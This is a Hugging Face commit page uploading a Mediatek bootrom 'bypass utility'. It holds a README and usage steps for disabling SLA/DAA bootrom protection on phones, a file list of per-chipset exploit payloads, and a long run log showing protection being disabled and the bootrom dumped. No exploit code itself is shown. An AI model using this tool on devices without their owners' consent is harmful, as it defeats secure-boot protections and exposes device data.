Upload folder using huggingface_hub
Browse filesThis view is limited to 50 files because it contains too many changes.
See raw diff
- .gitattributes +2 -0
- HOW_TO_USE.txt +5 -0
- LICENSE +21 -0
- README.md +52 -0
- UsbDk_1.0.22_x64.msi +3 -0
- bypass_utility.log +258 -0
- default_config.json5 +216 -0
- exploits_collection/README.md +34 -0
- exploits_collection/default_config.json5 +216 -0
- exploits_collection/payloads/generic_dump_payload.bin +3 -0
- exploits_collection/payloads/generic_loader_payload.bin +3 -0
- exploits_collection/payloads/generic_reboot_payload.bin +3 -0
- exploits_collection/payloads/generic_uart_dump_payload.bin +3 -0
- exploits_collection/payloads/mt6261_payload.bin +3 -0
- exploits_collection/payloads/mt6572_payload.bin +3 -0
- exploits_collection/payloads/mt6580_payload.bin +3 -0
- exploits_collection/payloads/mt6582_payload.bin +3 -0
- exploits_collection/payloads/mt6592_payload.bin +3 -0
- exploits_collection/payloads/mt6595_payload.bin +3 -0
- exploits_collection/payloads/mt6735_payload.bin +3 -0
- exploits_collection/payloads/mt6737_payload.bin +3 -0
- exploits_collection/payloads/mt6739_payload.bin +3 -0
- exploits_collection/payloads/mt6750_payload.bin +3 -0
- exploits_collection/payloads/mt6753_payload.bin +3 -0
- exploits_collection/payloads/mt6755_payload.bin +3 -0
- exploits_collection/payloads/mt6757_payload.bin +3 -0
- exploits_collection/payloads/mt6761_payload.bin +3 -0
- exploits_collection/payloads/mt6763_payload.bin +3 -0
- exploits_collection/payloads/mt6765_payload.bin +3 -0
- exploits_collection/payloads/mt6768_payload.bin +3 -0
- exploits_collection/payloads/mt6771_payload.bin +3 -0
- exploits_collection/payloads/mt6779_payload.bin +3 -0
- exploits_collection/payloads/mt6785_payload.bin +3 -0
- exploits_collection/payloads/mt6795_payload.bin +3 -0
- exploits_collection/payloads/mt6797_payload.bin +3 -0
- exploits_collection/payloads/mt6799_payload.bin +3 -0
- exploits_collection/payloads/mt6833_payload.bin +3 -0
- exploits_collection/payloads/mt6853_payload.bin +3 -0
- exploits_collection/payloads/mt6873_payload.bin +3 -0
- exploits_collection/payloads/mt6885_payload.bin +3 -0
- exploits_collection/payloads/mt8127_payload.bin +3 -0
- exploits_collection/payloads/mt8163_payload.bin +3 -0
- exploits_collection/payloads/mt8167_payload.bin +3 -0
- exploits_collection/payloads/mt8173_payload.bin +3 -0
- exploits_collection/payloads/mt8590_payload.bin +3 -0
- exploits_collection/payloads/mt8695_payload.bin +3 -0
- libusb-1.0.dll +3 -0
- main.py +237 -0
- mtk-bypass-utility.zip +3 -0
- mtk_bypass.bat +1 -0
.gitattributes
CHANGED
@@ -33,3 +33,5 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
|
|
33 |
*.zip filter=lfs diff=lfs merge=lfs -text
|
34 |
*.zst filter=lfs diff=lfs merge=lfs -text
|
35 |
*tfevents* filter=lfs diff=lfs merge=lfs -text
|
|
|
|
|
|
33 |
*.zip filter=lfs diff=lfs merge=lfs -text
|
34 |
*.zst filter=lfs diff=lfs merge=lfs -text
|
35 |
*tfevents* filter=lfs diff=lfs merge=lfs -text
|
36 |
+
UsbDk_1.0.22_x64.msi filter=lfs diff=lfs merge=lfs -text
|
37 |
+
libusb-1.0.dll filter=lfs diff=lfs merge=lfs -text
|
HOW_TO_USE.txt
ADDED
@@ -0,0 +1,5 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
1. Install python
|
2 |
+
2. Install UsbDk (64-bit)
|
3 |
+
3. Run `pip install pyusb==1.1.1 json5`
|
4 |
+
4. Run `python main.py'
|
5 |
+
5. Power off device & connect via usb in BROM Mode(https://androidrepairguide.blogspot.com/2025/04/connect-mediatek-device-in-brom-mode.html)
|
LICENSE
ADDED
@@ -0,0 +1,21 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
MIT License
|
2 |
+
|
3 |
+
Copyright (c) 2021 Dinolek
|
4 |
+
|
5 |
+
Permission is hereby granted, free of charge, to any person obtaining a copy
|
6 |
+
of this software and associated documentation files (the "Software"), to deal
|
7 |
+
in the Software without restriction, including without limitation the rights
|
8 |
+
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
9 |
+
copies of the Software, and to permit persons to whom the Software is
|
10 |
+
furnished to do so, subject to the following conditions:
|
11 |
+
|
12 |
+
The above copyright notice and this permission notice shall be included in all
|
13 |
+
copies or substantial portions of the Software.
|
14 |
+
|
15 |
+
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
16 |
+
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
17 |
+
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
18 |
+
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
19 |
+
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
20 |
+
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
21 |
+
SOFTWARE.
|
README.md
ADDED
@@ -0,0 +1,52 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
# Mediatek Bypass utility
|
2 |
+
|
3 |
+
> Personally tested on `Infinix Hot 10 Play X688B`
|
4 |
+
|
5 |
+
Small utility to disable bootrom protection(sla and daa) on Mediatek devices
|
6 |
+
|
7 |
+
## Usage on Windows
|
8 |
+
|
9 |
+
Skip steps 1-3 after first usage
|
10 |
+
|
11 |
+
1. Install [python (64-bit)](https://www.python.org/downloads)(select "Add Python X.X to PATH")
|
12 |
+
2. Install [UsbDk (64-bit)](https://github.com/daynix/UsbDk/releases)
|
13 |
+
3. Install pyusb, json5 with command:
|
14 |
+
|
15 |
+
```
|
16 |
+
pip install pyusb==1.1.1 json5
|
17 |
+
```
|
18 |
+
|
19 |
+
4. Run this command and connect your powered off phone with volume+ button, you should get "Protection disabled" at the end
|
20 |
+
|
21 |
+
```
|
22 |
+
python main.py
|
23 |
+
```
|
24 |
+
|
25 |
+
5. After that, without disconnecting phone, run SP Flash Tool
|
26 |
+
|
27 |
+
## Usage on Linux
|
28 |
+
|
29 |
+
Skip steps 1-2 after first usage
|
30 |
+
To use kamakiri you need [FireISO](https://github.com/amonet-kamakiri/fireiso/releases) or [this patch](https://github.com/amonet-kamakiri/kamakiri/blob/master/kernel.patch) for your kernel
|
31 |
+
|
32 |
+
Prebuilt kernels for various distros are available [here](https://github.com/amonet-kamakiri/prebuilt-kernels)
|
33 |
+
|
34 |
+
1. Install python
|
35 |
+
2. Install pyusb, json5 as root with command:
|
36 |
+
|
37 |
+
```
|
38 |
+
pip install pyusb json5
|
39 |
+
```
|
40 |
+
|
41 |
+
3. Run this command as root and connect your powered off phone with volume+ button, you should get "Protection disabled" at the end
|
42 |
+
|
43 |
+
```
|
44 |
+
./main.py
|
45 |
+
```
|
46 |
+
|
47 |
+
4. After that, without disconnecting phone, run SP Flash Tool in UART Connection mode
|
48 |
+
|
49 |
+
## Credits
|
50 |
+
|
51 |
+
- [@chaosmaster](https://github.com/chaosmaster)
|
52 |
+
- [@xyzz](https://github.com/xyzz)
|
UsbDk_1.0.22_x64.msi
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:91f6f695e1e13c656024e6d3b55620bf08d8835ef05ee0496935ba6bb62466a5
|
3 |
+
size 6348800
|
bypass_utility.log
ADDED
@@ -0,0 +1,258 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
[2025-03-30 18:55:40.163719] Waiting for device
|
2 |
+
[2025-03-30 18:55:52.424270] Found device = 0e8d:0003
|
3 |
+
[2025-03-30 18:55:52.650426] Device hw code: 0x766
|
4 |
+
[2025-03-30 18:55:52.650426] Device hw sub code: 0x8a00
|
5 |
+
[2025-03-30 18:55:52.651427] Device hw version: 0xca00
|
6 |
+
[2025-03-30 18:55:52.651427] Device sw version: 0x0
|
7 |
+
[2025-03-30 18:55:52.652427] Device secure boot: True
|
8 |
+
[2025-03-30 18:55:52.653429] Device serial link authorization: False
|
9 |
+
[2025-03-30 18:55:52.653429] Device download agent authorization: True
|
10 |
+
[2025-03-30 18:55:52.654428] Disabling watchdog timer
|
11 |
+
[2025-03-30 18:55:52.656534] Disabling protection
|
12 |
+
[2025-03-30 18:55:52.684046] Protection disabled
|
13 |
+
[2025-03-30 18:59:45.675191] Waiting for device
|
14 |
+
[2025-03-30 19:00:05.607088] Found device = 0e8d:0003
|
15 |
+
[2025-03-30 19:00:05.838795] Device hw code: 0x766
|
16 |
+
[2025-03-30 19:00:05.839797] Device hw sub code: 0x8a00
|
17 |
+
[2025-03-30 19:00:05.839797] Device hw version: 0xca00
|
18 |
+
[2025-03-30 19:00:05.840798] Device sw version: 0x0
|
19 |
+
[2025-03-30 19:00:05.841799] Device secure boot: True
|
20 |
+
[2025-03-30 19:00:05.842799] Device serial link authorization: False
|
21 |
+
[2025-03-30 19:00:05.843798] Device download agent authorization: True
|
22 |
+
[2025-03-30 19:00:05.844797] Disabling watchdog timer
|
23 |
+
[2025-03-30 19:00:05.846797] Disabling protection
|
24 |
+
[2025-03-30 19:00:05.874968] Protection disabled
|
25 |
+
[2025-03-30 19:06:55.042281] Waiting for device
|
26 |
+
[2025-03-30 19:07:02.741112] Found device = 0e8d:0003
|
27 |
+
[2025-03-30 19:07:02.963512] Device hw code: 0x766
|
28 |
+
[2025-03-30 19:07:02.964513] Device hw sub code: 0x8a00
|
29 |
+
[2025-03-30 19:07:02.965513] Device hw version: 0xca00
|
30 |
+
[2025-03-30 19:07:02.965513] Device sw version: 0x0
|
31 |
+
[2025-03-30 19:07:02.966513] Device secure boot: True
|
32 |
+
[2025-03-30 19:07:02.967514] Device serial link authorization: False
|
33 |
+
[2025-03-30 19:07:02.967514] Device download agent authorization: True
|
34 |
+
[2025-03-30 19:07:02.968514] Disabling watchdog timer
|
35 |
+
[2025-03-30 19:07:02.970879] Disabling protection
|
36 |
+
[2025-03-30 19:07:02.999589] Protection disabled
|
37 |
+
[2025-03-30 19:24:07.022011] Waiting for device
|
38 |
+
[2025-03-30 19:24:45.045941] Found device = 0e8d:0003
|
39 |
+
[2025-03-30 19:24:45.292066] Device hw code: 0x766
|
40 |
+
[2025-03-30 19:24:45.292066] Device hw sub code: 0x8a00
|
41 |
+
[2025-03-30 19:24:45.293068] Device hw version: 0xca00
|
42 |
+
[2025-03-30 19:24:45.295068] Device sw version: 0x0
|
43 |
+
[2025-03-30 19:24:45.296067] Device secure boot: True
|
44 |
+
[2025-03-30 19:24:45.296067] Device serial link authorization: False
|
45 |
+
[2025-03-30 19:24:45.297067] Device download agent authorization: True
|
46 |
+
[2025-03-30 19:24:45.298068] Disabling watchdog timer
|
47 |
+
[2025-03-30 19:24:45.300067] Disabling protection
|
48 |
+
[2025-03-30 19:24:45.331068] Protection disabled
|
49 |
+
[2025-03-30 14:27:17.677816] Waiting for device
|
50 |
+
[2025-03-30 14:28:01.724914] Found device = 0e8d:0003
|
51 |
+
[2025-03-30 14:28:01.972474] Device hw code: 0x766
|
52 |
+
[2025-03-30 14:28:01.972474] Device hw sub code: 0x8a00
|
53 |
+
[2025-03-30 14:28:01.973473] Device hw version: 0xca00
|
54 |
+
[2025-03-30 14:28:01.973473] Device sw version: 0x0
|
55 |
+
[2025-03-30 14:28:01.974474] Device secure boot: True
|
56 |
+
[2025-03-30 14:28:01.974474] Device serial link authorization: False
|
57 |
+
[2025-03-30 14:28:01.975473] Device download agent authorization: True
|
58 |
+
[2025-03-30 14:28:01.976475] Disabling watchdog timer
|
59 |
+
[2025-03-30 14:28:01.978241] Disabling protection
|
60 |
+
[2025-03-30 14:28:01.989243] Using kamakiri
|
61 |
+
[2025-03-30 14:28:01.999445] Protection disabled
|
62 |
+
[2025-03-30 14:31:17.857838] Waiting for device
|
63 |
+
[2025-03-30 14:31:26.788119] Found device = 0e8d:0003
|
64 |
+
[2025-03-30 14:31:27.015928] Device hw code: 0x766
|
65 |
+
[2025-03-30 14:31:27.016928] Device hw sub code: 0x8a00
|
66 |
+
[2025-03-30 14:31:27.016928] Device hw version: 0xca00
|
67 |
+
[2025-03-30 14:31:27.017929] Device sw version: 0x0
|
68 |
+
[2025-03-30 14:31:27.018927] Device secure boot: True
|
69 |
+
[2025-03-30 14:31:27.018927] Device serial link authorization: False
|
70 |
+
[2025-03-30 14:31:27.019928] Device download agent authorization: True
|
71 |
+
[2025-03-30 14:31:27.019928] Disabling watchdog timer
|
72 |
+
[2025-03-30 14:31:27.021927] Disabling protection
|
73 |
+
[2025-03-30 14:31:27.022929] Using kamakiri
|
74 |
+
[2025-03-30 14:31:27.034260] Protection disabled
|
75 |
+
[2025-03-30 15:00:38.624821] Waiting for device
|
76 |
+
[2025-03-30 15:00:49.075305] Found device = 0e8d:0003
|
77 |
+
[2025-03-30 15:00:49.301589] Device hw code: 0x766
|
78 |
+
[2025-03-30 15:00:49.302589] Device hw sub code: 0x8a00
|
79 |
+
[2025-03-30 15:00:49.303590] Device hw version: 0xca00
|
80 |
+
[2025-03-30 15:00:49.303590] Device sw version: 0x0
|
81 |
+
[2025-03-30 15:00:49.304589] Device secure boot: True
|
82 |
+
[2025-03-30 15:00:49.304589] Device serial link authorization: False
|
83 |
+
[2025-03-30 15:00:49.305590] Device download agent authorization: True
|
84 |
+
[2025-03-30 15:00:49.306591] Disabling watchdog timer
|
85 |
+
[2025-03-30 15:00:49.308590] Disabling protection
|
86 |
+
[2025-03-30 15:00:49.310590] Using kamakiri
|
87 |
+
[2025-03-30 15:00:49.321530] Protection disabled
|
88 |
+
[2025-03-30 15:58:29.967337] Waiting for device
|
89 |
+
[2025-03-30 15:58:53.410958] Found device = 0e8d:0003
|
90 |
+
[2025-03-30 15:58:53.710266] Device hw code: 0x766
|
91 |
+
[2025-03-30 15:58:53.711267] Device hw sub code: 0x8a00
|
92 |
+
[2025-03-30 15:58:53.711267] Device hw version: 0xca00
|
93 |
+
[2025-03-30 15:58:53.712267] Device sw version: 0x0
|
94 |
+
[2025-03-30 15:58:53.712267] Device secure boot: True
|
95 |
+
[2025-03-30 15:58:53.713267] Device serial link authorization: False
|
96 |
+
[2025-03-30 15:58:53.714266] Device download agent authorization: True
|
97 |
+
[2025-03-30 15:58:53.715266] Disabling watchdog timer
|
98 |
+
[2025-03-30 15:58:53.717291] Disabling protection
|
99 |
+
[2025-03-30 15:58:53.749015] Protection disabled
|
100 |
+
[2025-03-30 16:03:40.629448] Waiting for device
|
101 |
+
[2025-03-30 16:03:47.032978] Found device = 0e8d:0003
|
102 |
+
[2025-03-30 16:03:47.302838] Device hw code: 0x766
|
103 |
+
[2025-03-30 16:03:47.303838] Device hw sub code: 0x8a00
|
104 |
+
[2025-03-30 16:03:47.304839] Device hw version: 0xca00
|
105 |
+
[2025-03-30 16:03:47.305839] Device sw version: 0x0
|
106 |
+
[2025-03-30 16:03:47.306840] Device secure boot: True
|
107 |
+
[2025-03-30 16:03:47.307842] Device serial link authorization: False
|
108 |
+
[2025-03-30 16:03:47.308840] Device download agent authorization: True
|
109 |
+
[2025-03-30 16:03:47.308840] Disabling watchdog timer
|
110 |
+
[2025-03-30 16:03:47.311839] Disabling protection
|
111 |
+
[2025-03-30 16:03:47.342886] Protection disabled
|
112 |
+
[2025-03-30 16:04:19.031387] Waiting for device
|
113 |
+
[2025-03-30 16:04:36.829544] Found device = 0e8d:0003
|
114 |
+
[2025-03-30 16:04:37.098365] Device hw code: 0x766
|
115 |
+
[2025-03-30 16:04:37.098365] Device hw sub code: 0x8a00
|
116 |
+
[2025-03-30 16:04:37.099366] Device hw version: 0xca00
|
117 |
+
[2025-03-30 16:04:37.100366] Device sw version: 0x0
|
118 |
+
[2025-03-30 16:04:37.100366] Device secure boot: True
|
119 |
+
[2025-03-30 16:04:37.101367] Device serial link authorization: False
|
120 |
+
[2025-03-30 16:04:37.102367] Device download agent authorization: True
|
121 |
+
[2025-03-30 16:04:37.102367] Disabling watchdog timer
|
122 |
+
[2025-03-30 16:04:37.105274] Disabling protection
|
123 |
+
[2025-03-30 16:04:37.177177] Protection disabled
|
124 |
+
[2025-03-30 16:24:47.810791] Waiting for device
|
125 |
+
[2025-03-30 16:26:05.907340] Found device = 0e8d:2000
|
126 |
+
[2025-03-30 16:26:17.839154] Device hw code: 0x766
|
127 |
+
[2025-03-30 16:26:17.839154] Device hw sub code: 0x8a00
|
128 |
+
[2025-03-30 16:26:17.840160] Device hw version: 0xca00
|
129 |
+
[2025-03-30 16:26:17.841157] Device sw version: 0x0
|
130 |
+
[2025-03-30 16:26:17.842157] Device secure boot: True
|
131 |
+
[2025-03-30 16:26:17.843157] Device serial link authorization: False
|
132 |
+
[2025-03-30 16:26:17.843157] Device download agent authorization: True
|
133 |
+
[2025-03-30 16:26:17.845157] Found device in preloader mode, trying to crash...
|
134 |
+
[2025-03-30 16:26:17.847157] status is 7024
|
135 |
+
[2025-03-30 16:26:18.854501] Waiting for device
|
136 |
+
[2025-03-30 16:26:18.856501] Found device = 0e8d:0003
|
137 |
+
[2025-03-30 16:26:19.119788] Device hw code: 0x766
|
138 |
+
[2025-03-30 16:26:19.119788] Device hw sub code: 0x8a00
|
139 |
+
[2025-03-30 16:26:19.121053] Device hw version: 0xca00
|
140 |
+
[2025-03-30 16:26:19.122054] Device sw version: 0x0
|
141 |
+
[2025-03-30 16:26:19.122054] Device secure boot: True
|
142 |
+
[2025-03-30 16:26:19.123055] Device serial link authorization: False
|
143 |
+
[2025-03-30 16:26:19.124054] Device download agent authorization: True
|
144 |
+
[2025-03-30 16:26:19.124054] Disabling watchdog timer
|
145 |
+
[2025-03-30 16:26:19.126714] Disabling protection
|
146 |
+
[2025-03-30 16:26:19.156884] Protection disabled
|
147 |
+
[2025-03-30 16:28:14.415118] Waiting for device
|
148 |
+
[2025-03-30 16:28:14.417119] Found device = 0e8d:0003
|
149 |
+
[2025-03-30 16:28:14.684816] Device hw code: 0x766
|
150 |
+
[2025-03-30 16:28:14.685815] Device hw sub code: 0x8a00
|
151 |
+
[2025-03-30 16:28:14.686816] Device hw version: 0xca00
|
152 |
+
[2025-03-30 16:28:14.686816] Device sw version: 0x0
|
153 |
+
[2025-03-30 16:28:14.687816] Device secure boot: False
|
154 |
+
[2025-03-30 16:28:14.687816] Device serial link authorization: False
|
155 |
+
[2025-03-30 16:28:14.688817] Device download agent authorization: False
|
156 |
+
[2025-03-30 16:28:14.689818] Disabling watchdog timer
|
157 |
+
[2025-03-30 16:28:14.692135] Insecure device, sending payload using send_da
|
158 |
+
[2025-03-30 16:28:14.748482] Found send_dword, dumping bootrom to bootrom_766.bin
|
159 |
+
[2025-03-30 16:29:05.907328] Waiting for device
|
160 |
+
[2025-03-30 16:29:09.219474] Found device = 0e8d:2000
|
161 |
+
[2025-03-30 16:29:20.608828] Device hw code: 0x766
|
162 |
+
[2025-03-30 16:29:20.609829] Device hw sub code: 0x8a00
|
163 |
+
[2025-03-30 16:29:20.610816] Device hw version: 0xca00
|
164 |
+
[2025-03-30 16:29:20.610816] Device sw version: 0x0
|
165 |
+
[2025-03-30 16:29:20.612815] Device secure boot: True
|
166 |
+
[2025-03-30 16:29:20.613815] Device serial link authorization: False
|
167 |
+
[2025-03-30 16:29:20.613815] Device download agent authorization: True
|
168 |
+
[2025-03-30 16:29:20.614831] Found device in preloader mode, trying to crash...
|
169 |
+
[2025-03-30 16:29:20.617909] status is 7024
|
170 |
+
[2025-03-30 16:29:21.620024] Waiting for device
|
171 |
+
[2025-03-30 16:29:21.622036] Found device = 0e8d:0003
|
172 |
+
[2025-03-30 16:29:21.867785] Device hw code: 0x766
|
173 |
+
[2025-03-30 16:29:21.868785] Device hw sub code: 0x8a00
|
174 |
+
[2025-03-30 16:29:21.868785] Device hw version: 0xca00
|
175 |
+
[2025-03-30 16:29:21.869786] Device sw version: 0x0
|
176 |
+
[2025-03-30 16:29:21.869786] Device secure boot: True
|
177 |
+
[2025-03-30 16:29:21.870786] Device serial link authorization: False
|
178 |
+
[2025-03-30 16:29:21.871787] Device download agent authorization: True
|
179 |
+
[2025-03-30 16:29:21.872791] Disabling watchdog timer
|
180 |
+
[2025-03-30 16:29:21.875154] Disabling protection
|
181 |
+
[2025-03-30 16:29:21.905106] Protection disabled
|
182 |
+
[2025-03-30 16:48:01.676685] Waiting for device
|
183 |
+
[2025-03-30 16:48:01.677686] Found device = 0e8d:2000
|
184 |
+
[2025-03-30 16:48:13.037939] Device hw code: 0x766
|
185 |
+
[2025-03-30 16:48:13.037939] Device hw sub code: 0x8a00
|
186 |
+
[2025-03-30 16:48:13.038942] Device hw version: 0xca00
|
187 |
+
[2025-03-30 16:48:13.039941] Device sw version: 0x0
|
188 |
+
[2025-03-30 16:48:13.039941] Device secure boot: True
|
189 |
+
[2025-03-30 16:48:13.040941] Device serial link authorization: False
|
190 |
+
[2025-03-30 16:48:13.042941] Device download agent authorization: True
|
191 |
+
[2025-03-30 16:48:13.043942] Found device in preloader mode, trying to crash...
|
192 |
+
[2025-03-30 16:48:13.047942] status is 7024
|
193 |
+
[2025-03-30 16:48:14.057950] Waiting for device
|
194 |
+
[2025-03-30 16:48:14.058950] Found device = 0e8d:0003
|
195 |
+
[2025-03-30 16:48:14.320814] Device hw code: 0x766
|
196 |
+
[2025-03-30 16:48:14.321814] Device hw sub code: 0x8a00
|
197 |
+
[2025-03-30 16:48:14.322814] Device hw version: 0xca00
|
198 |
+
[2025-03-30 16:48:14.322814] Device sw version: 0x0
|
199 |
+
[2025-03-30 16:48:14.323814] Device secure boot: True
|
200 |
+
[2025-03-30 16:48:14.325324] Device serial link authorization: False
|
201 |
+
[2025-03-30 16:48:14.327346] Device download agent authorization: True
|
202 |
+
[2025-03-30 16:48:14.328346] Disabling watchdog timer
|
203 |
+
[2025-03-30 16:48:14.330887] Disabling protection
|
204 |
+
[2025-03-30 16:48:14.363226] Protection disabled
|
205 |
+
[2025-03-30 16:50:45.192561] Waiting for device
|
206 |
+
[2025-03-30 16:51:25.446559] Found device = 0e8d:2000
|
207 |
+
[2025-03-30 16:51:37.474047] Device hw code: 0x766
|
208 |
+
[2025-03-30 16:51:37.475048] Device hw sub code: 0x8a00
|
209 |
+
[2025-03-30 16:51:37.476050] Device hw version: 0xca00
|
210 |
+
[2025-03-30 16:51:37.477048] Device sw version: 0x0
|
211 |
+
[2025-03-30 16:51:37.477048] Device secure boot: True
|
212 |
+
[2025-03-30 16:51:37.478050] Device serial link authorization: False
|
213 |
+
[2025-03-30 16:51:37.479049] Device download agent authorization: True
|
214 |
+
[2025-03-30 16:51:37.480049] Found device in preloader mode, trying to crash...
|
215 |
+
[2025-03-30 16:51:37.482048] status is 7024
|
216 |
+
[2025-03-30 16:51:38.490922] Waiting for device
|
217 |
+
[2025-03-30 16:51:38.492932] Found device = 0e8d:0003
|
218 |
+
[2025-03-30 16:51:38.703067] Device hw code: 0x766
|
219 |
+
[2025-03-30 16:51:38.704575] Device hw sub code: 0x8a00
|
220 |
+
[2025-03-30 16:51:38.704575] Device hw version: 0xca00
|
221 |
+
[2025-03-30 16:51:38.706006] Device sw version: 0x0
|
222 |
+
[2025-03-30 16:51:38.707006] Device secure boot: True
|
223 |
+
[2025-03-30 16:51:38.708007] Device serial link authorization: False
|
224 |
+
[2025-03-30 16:51:38.709010] Device download agent authorization: True
|
225 |
+
[2025-03-30 16:51:38.709010] Disabling watchdog timer
|
226 |
+
[2025-03-30 16:51:38.711008] Disabling protection
|
227 |
+
[2025-03-30 16:51:38.741665] Protection disabled
|
228 |
+
[2025-03-30 17:29:04.508432] Waiting for device
|
229 |
+
[2025-03-30 17:29:25.433937] Found device = 0e8d:2000
|
230 |
+
[2025-03-30 17:29:36.976516] Device hw code: 0x766
|
231 |
+
[2025-03-30 17:29:36.977516] Device hw sub code: 0x8a00
|
232 |
+
[2025-03-30 17:29:36.978517] Device hw version: 0xca00
|
233 |
+
[2025-03-30 17:29:36.979518] Device sw version: 0x0
|
234 |
+
[2025-03-30 17:29:36.982520] Device secure boot: True
|
235 |
+
[2025-03-30 17:29:36.982520] Device serial link authorization: False
|
236 |
+
[2025-03-30 17:29:36.983517] Device download agent authorization: True
|
237 |
+
[2025-03-30 17:29:36.984519] Found device in preloader mode, trying to crash...
|
238 |
+
[2025-03-30 17:29:36.987517] status is 7024
|
239 |
+
[2025-03-30 17:29:37.998632] Waiting for device
|
240 |
+
[2025-03-30 17:29:38.000634] Found device = 0e8d:0003
|
241 |
+
[2025-03-30 17:29:38.267953] Device hw code: 0x766
|
242 |
+
[2025-03-30 17:29:38.267953] Device hw sub code: 0x8a00
|
243 |
+
[2025-03-30 17:29:38.269465] Device hw version: 0xca00
|
244 |
+
[2025-03-30 17:29:38.269465] Device sw version: 0x0
|
245 |
+
[2025-03-30 17:29:38.271801] Device secure boot: True
|
246 |
+
[2025-03-30 17:29:38.271801] Device serial link authorization: False
|
247 |
+
[2025-03-30 17:29:38.272799] Device download agent authorization: True
|
248 |
+
[2025-03-30 17:29:38.273802] Disabling watchdog timer
|
249 |
+
[2025-03-30 17:29:38.275799] Disabling protection
|
250 |
+
[2025-03-30 17:29:38.308307] Protection disabled
|
251 |
+
[2025-03-31 11:21:37.435686] Waiting for device
|
252 |
+
[2025-03-31 11:22:51.706012] Waiting for device
|
253 |
+
[2025-03-31 18:00:48.057530] Waiting for device
|
254 |
+
[2025-03-31 18:01:03.802597] Found device = 0e8d:2000
|
255 |
+
[2025-04-17 14:51:05.202982] Waiting for device
|
256 |
+
[2025-04-17 14:53:10.254121] Waiting for device
|
257 |
+
[2025-04-17 14:54:45.863924] Waiting for device
|
258 |
+
[2025-04-17 14:55:22.032165] Waiting for device
|
default_config.json5
ADDED
@@ -0,0 +1,216 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
